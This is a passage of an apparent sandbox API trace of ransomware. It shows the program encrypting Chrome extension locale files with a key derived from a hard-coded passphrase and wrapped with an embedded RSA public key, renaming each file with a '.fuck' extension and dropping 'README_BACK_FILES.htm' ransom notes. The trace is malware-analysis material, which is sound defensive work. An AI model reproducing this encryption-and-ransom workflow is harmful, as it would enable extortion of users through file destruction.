KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----b", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0252.083] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0252.083] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x298b0b8) returned 1 [0252.084] CryptImportPublicKeyInfo (in: hCryptProv=0x298b0b8, dwCertEncodingType=0x1, pInfo=0x2991db0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2991de0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2991de8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x29847a0) returned 1 [0252.084] CryptEncrypt (in: hKey=0x29847a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0252.084] CryptEncrypt (in: hKey=0x29847a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x298a3f8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x298a3f8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0252.084] WriteFile (in: hFile=0x5d5c, lpBuffer=0x298a3f8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x298a3f8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0252.085] ReadFile (in: hFile=0x5d64, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xb3, lpOverlapped=0x0) returned 1 [0252.087] CryptEncrypt (in: hKey=0x29846a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xb3, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xc0) returned 1 [0252.087] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xc0, lpOverlapped=0x0) returned 1 [0252.087] CloseHandle (hObject=0x5d64) returned 1 [0252.087] CloseHandle (hObject=0x5d5c) returned 1 [0252.087] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json"), bFailIfExists=0) returned 1 [0252.091] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json", dwFileAttributes=0x0) returned 1 [0252.092] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json.gsg")) returned 1 [0252.093] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json.fuck")) returned 1 [0252.094] CryptDestroyHash (hHash=0x29844e0) returned 1 [0252.094] CryptDestroyKey (hKey=0x29846a0) returned 1 [0252.094] CryptReleaseContext (hProv=0x298a040, dwFlags=0x0) returned 1 [0252.094] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0252.094] FindClose (in: hFindFile=0x2985a20 | out: hFindFile=0x2985a20) returned 1 [0252.095] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\readme_back_files.htm")) returned 0xffffffff [0252.095] AreFileApisANSI () returned 1 [0252.095] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 155 [0252.095] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0252.095] GetFileType (hFile=0x5d60) returned 0x1 [0252.096] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0252.097] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0252.097] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985a20 [0252.097] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0252.097] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0252.097] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0252.097] GetLastError () returned 0x0 [0252.097] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json")) returned 0x20 [0252.097] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json", dwFileAttributes=0x80) returned 1 [0252.098] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0252.098] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0252.100] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0252.100] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298a040) returned 1 [0252.102] CryptCreateHash (in: hProv=0x298a040, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0252.102] lstrlenA (lpString="KbTPpdThroOLqoAPDACZIGRTzMlQm") returned 29 [0252.102] CryptHashData (hHash=0x2984760, pbData=0x28cb530, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0252.102] CryptDeriveKey (in: hProv=0x298a040, Algid=0x6610, hBaseData=0x2984760, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x29846a0) returned 1 [0252.103] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----b", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0252.103] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0252.103] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x298a948) returned 1 [0252.103] CryptImportPublicKeyInfo (in: hCryptProv=0x298a948, dwCertEncodingType=0x1, pInfo=0x2993950*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2993980*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2993988*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x29844e0) returned 1 [0252.103] CryptEncrypt (in: hKey=0x29844e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0252.103] CryptEncrypt (in: hKey=0x29844e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x298a9d0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x298a9d0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0252.103] WriteFile (in: hFile=0x5d64, lpBuffer=0x298a9d0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x298a9d0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0252.105] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xb3, lpOverlapped=0x0) returned 1 [0252.106] CryptEncrypt (in: hKey=0x29846a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xb3, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xc0) returned 1 [0252.106] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xc0, lpOverlapped=0x0) returned 1 [0252.106] CloseHandle (hObject=0x5d5c) returned 1 [0252.107] CloseHandle (hObject=0x5d64) returned 1 [0252.107] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json"), bFailIfExists=0) returned 1 [0252.110] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json", dwFileAttributes=0x0) returned 1 [0252.111] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json.gsg")) returned 1 [0252.112] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json.fuck")) returned 1 [0252.113] CryptDestroyHash (hHash=0x2984760) returned 1 [0252.113] CryptDestroyKey (hKey=0x29846a0) returned 1 [0252.113] CryptReleaseContext (hProv=0x298a040, dwFlags=0x0) returned 1 [0252.113] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0252.113] FindClose (in: hFindFile=0x2985a20 | out: hFindFile=0x2985a20) returned 1 [0252.113] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\readme_back_files.htm")) returned 0xffffffff [0252.114] AreFileApisANSI () returned 1 [0252.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 155 [0252.114] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0252.114] GetFileType (hFile=0x5d60) returned 0x1 [0252.114] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0252.116] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0252.116] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985a20 [0252.116] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0252.116] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0252.116] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0252.116] GetLastError () returned 0x0 [0252.116] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json")) returned 0x20 [0252.117] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json", dwFileAttributes=0x80) returned 1 [0252.118] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0252.118] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0252.119] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0252.120] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298a040) returned 1 [0252.122] CryptCreateHash (in: hProv=0x298a040, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0252.122] lstrlenA (lpString="KbTPpdThroOLqoAPDACZIGRTzMlQm") returned 29 [0252.122] CryptHashData (hHash=0x29846a0, pbData=0x28cb2d8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0252.122] CryptDeriveKey (in: hProv=0x298a040, Algid=0x6610, hBaseData=0x29846a0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2983fe0) returned 1 [0252.123] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----b", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0252.123] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0252.123] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x298b1c8) returned 1 [0252.124] CryptImportPublicKeyInfo (in: hCryptProv=0x298b1c8, dwCertEncodingType=0x1, pInfo=0x29932d0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2993300*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2993308*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x29841a0) returned 1 [0252.124] CryptEncrypt (in: hKey=0x29841a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0252.124] CryptEncrypt (in: hKey=0x29841a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x298aa58*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x298aa58*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0252.124] WriteFile (in: hFile=0x5d5c, lpBuffer=0x298aa58*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x298aa58*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0252.125] ReadFile (in: hFile=0x5d64, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xb3, lpOverlapped=0x0) returned 1 [0252.126] CryptEncrypt (in: hKey=0x2983fe0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xb3, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xc0) returned 1 [0252.126] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xc0, lpOverlapped=0x0) returned 1 [0252.127] CloseHandle (hObject=0x5d64) returned 1 [0252.127] CloseHandle (hObject=0x5d5c) returned 1 [0252.127] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json.gsg"), 